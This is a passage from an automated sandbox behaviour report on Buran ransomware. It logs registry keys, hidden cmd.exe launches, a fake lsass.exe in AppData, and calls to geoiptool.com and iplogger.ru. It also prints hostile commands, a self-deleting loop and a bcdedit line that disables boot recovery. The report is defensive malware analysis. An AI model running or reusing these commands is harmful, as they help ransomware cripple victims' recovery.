Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 15
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 3
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 9
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 122
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 72
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 3
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Buran III value_name = Stop, type = REG_NONE False 11
Fn
Write Value HKEY_CURRENT_USER\Software\Buran III\Service value_name = Public Key, data = 3xzYJ+y2NSmw1xLZFfqXhuF5kR6Tyk7ifM2IMf21mKAmd9FUIZxRRM9uZ8WMatN83zZgiDNyGXH8XLlIVXkhgS9kyLlQj+PUyNaSNs0RCIA7utad7O7p1l7BCCFo4IHpVe5T2HpPBsOhZbmuVgxZ9oZ+0A2LziNCZ2+TttReaL7jLhJzU5m/NV+ommU5fkNcPj7F351ilYGzTVokHcqcBMBtP1+YXDJ7wIrZt9rit1E1zHKPkHTgla3Z7s+AxlcgyU3Mlc9W9mIo4zYiN2byFdaKANJIfIvV50dmtS2FcZ7QgvBTviuoczgIANQxzqG2mc6bQyukV+q+nEhWHRgyFzXRdzVSL2b42JKlzz7+oGJRq5XPjtyJcqxBKSLO2FtzudAFiThOo6cL2XYBkzNg, size = 405, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Buran III\Service value_name = Machine ID, data = xkf6VLCLiDdgyCVpw8u0Gt0be4BahDg10uriU0NSP2J4tAYz7Girojw8L38vPTmc0gxy1dUqBEIIEfl0MlyUXg9wvlg09maFu7FeRqJTF+/P43l2Fg8QcmgW6EdxjnB7wkYyBXz+NvmCD6+vn/X72B5HXZ3roCDM1FbK0RSU6gueoI0JbLp3YfhMJYMkUlR8y0+uMQoXgNgpYzWAf/5jy5zQEJbBlgRbC9pEfgNmnW4naIvEn6tczqcwekAagDEZmNPtcoUHgh7eLlngYkyeZ8U3gmuNctrWyRnfhbgDQ5yb6kIdJ2Pi3kYsXuwACi/IoTEINPA9X7dsJ5KtUBQpoSDvhwRM6Q4vtkfZz/Ikv2sLRpErxIwOulXxNu4bU6IEyLSFCG4NIRgPdBgHCX5lRFkPl8L5zgXhEHNr8qKrIcIIiNaGhX120R15vHbaMF1oJVGaVZ8fKHe4O5B6smW6VNlv3f3d6O5vGkhEiU9sl+MRXo0LclmkmMxeGRM+vY9TNJbFqNfzSz5W5iW2tBAJAvrxWiIy6Zlxvjr8TfKhkRSxWft2f1cWiY1RQGpdOidvHlaPetwBhaCnugDilR6DYOVavuRT1pWGFNzYCwqEBKGdutNr+qz1gYVn3a3zulX5rD1Ks8S3iKC0O8fTPoLXsblfEsMb815hMpDFTEEGEAHojZ5GljPpyepAFUqOXm+LiYuWoO3Hb0s4Rk8qE3Om6/upeM7I2jRn9/Emk/onyuYJXDz3Ai76lU7DR+ne9WYYHNYeezuWmWanwUBpSKabygJEzVYgKKU7yNphPCJ4w+VRjOnkRUKU2FjIwwMxaKMl+NtNgee/05w9MpwkYjiJtTeREmRCvuSexXiNtyXcKPnBnlf51m84mW6k3pKdzILWUeZfaxp4CPpHndggt5HAytUckmFJqWCdJVeQDH+Q9eCAARqae53A6ZlJYst+8f6ekivJGjtrGqfZyjKWeuDtH4oO4jEa5q0j3bAV1uE3ELzItR6aYrsaXyrgzAK22ewZwNlEOIMl8IsoQQ22zHYZDHqTgjVQXBZVzH/CaMyNciukoB2TDFHOHvYycwX13LMyxEweR7uC+Ea8O6ms5M14kRpBAoxWO6iSVc+2smCiSshToaktTwmO/ZmGlpKjXkbia6M6rk0YotUqkpIiLegd4VvVouZ4/U6kZ/kYLwY8+3nJMY9LW4LkIGPT6gapGXTx5GBsraAlPk2urWlvPqW58Dp0Q+3sQZZFkSCED3zvohptM9eZS0lBysl92wu9kfPmIIy3ztdpvjJRcuhVZaLwqtk8tJThW0jxItcnUi7epciw3crM3VoJKNR3J0jv6ZVZMMkrM6NKxdjwuTYUXykWsCz95OgRhKfq4wyQA8yP2pe8TrJzKlAhnUNpkNx5AUs5B8gE/9ocMSH7eH4/OB0OR0IsSX/WQbB2oVns0a0XQj27gEoBZXWEjrBHFB1WJTkXu04Ig3gV2I4+T7btHj5JBudkWzZxgwZOagU6AQKrIuTxg8NiHVmOC6PY1O25Yp4/yg5RhAkqCzDtcerKD/V6DkJFbmbW6X0k8IG2od7N1Y5ThCbF1O8Jr6gEtsSjNdxG4b4VtnYEFAoOBa92+OCNRYuXJxII5NedV5tWJNcC9YfsbHKFVdE/rCedL6QuOPwPx++NWOfEu67eLHpBhCMj0+Oo7QPrEsUqoIYqUapkCT01XGS4UhgjOgY1JhSKX1566l3kJQ==, size = 1737, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Buran III value_name = Knock, data = 666, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (17)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0x944, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x930, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x99c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x9ec, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x9d4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x9c8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x3d0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x878, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x844, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x824, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xa9c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xa98, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x9b4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xa84, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xa78, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb64, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb70, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (37)
»
Operation Module Additional Information Success Count Logfile
Load C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.ENU base_address = 0x0 False 1
Fn
Load C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN base_address = 0x0 False 1
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe base_address = 0x400000 True 6
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75220000 True 1
Fn
Get Filename c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 True 1
Fn
Get Filename C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.EN process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe, size = 261 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceExA, address_out = 0x76cb434f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VariantChangeTypeEx, address_out = 0x75224c28 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x7529c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x7529ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75245934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x7529d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x7529dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x7529e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x7529f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x7529f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75245a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x7529ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x7529ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x7523b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarI4FromStr, address_out = 0x75236fab True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromStr, address_out = 0x752401a0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR8FromStr, address_out = 0x7523699e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromStr, address_out = 0x75246ba7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyFromStr, address_out = 0x75266c12 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBoolFromStr, address_out = 0x7523dbd1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromCy, address_out = 0x75247fdc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromDate, address_out = 0x75237a2a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrFromBool, address_out = 0x75240355 True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = 0, result_out = 4 True 1
Fn
System (844)
»
Operation Additional Information Success Count Logfile
Sleep duration = 666 milliseconds (0.666 seconds) True 1
Fn
Sleep duration = 10 milliseconds (0.010 seconds) True 327
Fn
Get Time type = Performance Ctr, time = 20355883516 True 1
Fn
Get Time type = Ticks, time = 143130 True 1
Fn
Get Time type = Performance Ctr, time = 20543511400 True 1
Fn
Get Time type = Performance Ctr, time = 20543517375 True 1
Fn
Get Time type = Performance Ctr, time = 20543522262 True 1
Fn
Get Time type = Performance Ctr, time = 20543527135 True 1
Fn
Get Time type = Performance Ctr, time = 20543531955 True 1
Fn
Get Time type = Performance Ctr, time = 20543835321 True 1
Fn
Get Time type = Performance Ctr, time = 20543840457 True 1
Fn
Get Time type = Performance Ctr, time = 20543845401 True 1
Fn
Get Time type = Performance Ctr, time = 20543851670 True 1
Fn
Get Time type = Performance Ctr, time = 20543856464 True 1
Fn
Get Info type = Operating System True 503
Fn
Get Info type = Operating System True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String name = TEMP, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 2
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 17
Fn
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 153 bytes
Total Data Received 965 bytes
Contacted Host Count 2
Contacted Hosts 158.69.67.193, 88.99.66.31
HTTP Session #1
»
Information Value
Server Name geoiptool.com
Server Port 80
Username -
Password -
Data Sent 39 bytes
Data Received 380 bytes
Operation Additional Information Success Count Logfile
Open Session access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = geoiptool.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1 True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://geoiptool.com True 1
Fn
Read Response size = 1024, size_out = 1024 True 19
Fn
Data
Read Response size = 1024, size_out = 818 True 1
Fn
Data
Read Response size = 1024, size_out = 0 True 1
Fn
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent BURAN
Server Name iplogger.ru
Server Port 80
Username -
Password -
Data Sent 114 bytes
Data Received 585 bytes
Operation Additional Information Success Count Logfile
Open Session access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = iplogger.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = 1nuF67.html, accept_types = 0, flags = INTERNET_FLAG_IDN_DIRECT, INTERNET_FLAG_IDN_PROXY True 1
Fn
Add HTTP Request Headers headers = Host: iplogger.ru User-Agent: BURAN Referer: 3EC7AD33-C616-54FC-3819-FD033E71F165 True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = iplogger.ru/1nuF67.html True 1
Fn
Read Response size = 4097, size_out = 116 True 1
Fn
Data
Read Response size = 4097, size_out = 0 True 1
Fn
Close Session - True 1
Fn
Process #9: cmd.exe
138 0
»
Information Value
ID #9
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png" & if not exist "C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png" exit )
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0x210
Parent PID 0xb38 (c:\users\5p5nrg~1\appdata\local\tempxee84.png)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 2A8
Host Behavior
File (89)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 16
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 51
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 2 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 20 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 1 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 4 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 13 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 3 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 50 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 54 True 1
Fn
Data
Delete C:\Users\5P5NRG~1\AppData\Local\TempxeE84.png - True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x49e00000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:10 (UTC) True 1
Fn
Get Time type = Ticks, time = 135050 True 1
Fn
Get Time type = Performance Ctr, time = 19543766588 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 2
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = x in (1,1,999) do ( ping -n 3 127.1 & del "C False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #10: ping.exe
25 1
»
Information Value
ID #10
File Name c:\windows\syswow64\ping.exe
Command Line ping -n 3 127.1
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:15, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0x184
Parent PID 0x210 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 618
0x 344
0x 2C8
0x 204
Host Behavior
File (16)
»
Operation Filename Additional Information Success Count Logfile
Write STD_OUTPUT_HANDLE size = 20 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 24 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 22 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 9 True 9
Fn
Data
Write STD_OUTPUT_HANDLE size = 92 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 97 True 1
Fn
Data
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters value_name = DefaultTTL, data = 0, type = REG_NONE False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\ping.exe base_address = 0x8b0000 True 1
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1000 milliseconds (1.000 seconds) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:11 (UTC) True 1
Fn
Get Time type = Ticks, time = 135596 True 1
Fn
Get Time type = Performance Ctr, time = 19601948957 True 1
Fn
Network Behavior
ICMP (3)
»
Operation Additional Information Success Count Logfile
Send ICMP Echo source_address = 0.0.0.0, destination_address = 127.0.0.1, timeout = 4000 True 3
Fn
DNS (1)
»
Operation Additional Information Success Count Logfile
Resolve Name host = 127.1, address_out = 127.0.0.1 True 1
Fn
Process #11: cmd.exe
56 0
»
Information Value
ID #11
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:29, Reason: Child Process
Unmonitor End Time: 00:01:29, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x944
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 96C
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 98 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a450000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
